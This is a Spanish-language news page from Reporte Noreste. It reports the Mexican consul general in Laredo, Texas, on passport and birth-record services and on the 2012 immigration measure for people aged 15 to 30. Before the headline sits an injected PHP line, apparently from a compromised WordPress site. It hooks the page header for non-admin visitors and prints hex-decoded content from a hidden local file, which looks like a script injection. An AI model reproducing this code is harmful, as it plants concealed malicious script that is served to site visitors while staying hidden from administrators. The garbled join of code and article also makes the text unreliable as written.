if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Reforma migratoria beneficia a personas entre 15 y 30 años, aforma la Cónsul – Reporte Noreste
Conéctate con nosotros

Nuevo Laredo Tamps.- La Cónsul General de México en Laredo Texas, Carolina Zaragoza Flores, mencionó que la ciudadanía está tramitando pasaporte mexicano y actas de nacimiento en dicho consulado, la funcionaria dijo que es ella quien lleva a cabo el documento de registros pues es jueza de registro civil, notaria pública y oficial migrante, por lo que también expide visas.

“Se les hace el trámite de sus actas siempre y cuando estén dados de alta en el sistema, de esta manera ahorran tiempo y dinero”, comentó la funcionaria.

Zaragoza Flores dijo que las personas que tienen entre 15 y 30 años y que fueron llevadas a Estados Unidos en su infancia tienen la oportunidad de realizar un procedimiento administrativo que se aprobó en 2012 con la reforma migratoria y obtendrán los siguientes beneficios: permisos de trabajo, licencias, seguros y becas.

“Si tienen algún problema les brindamos asesorías jurídica los viernes”, concluyó la Cónsul.

Corresponsal en Reynosa Tamaulipas.

Haga clic para comentar

Leave a Reply

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Más en Corresponsales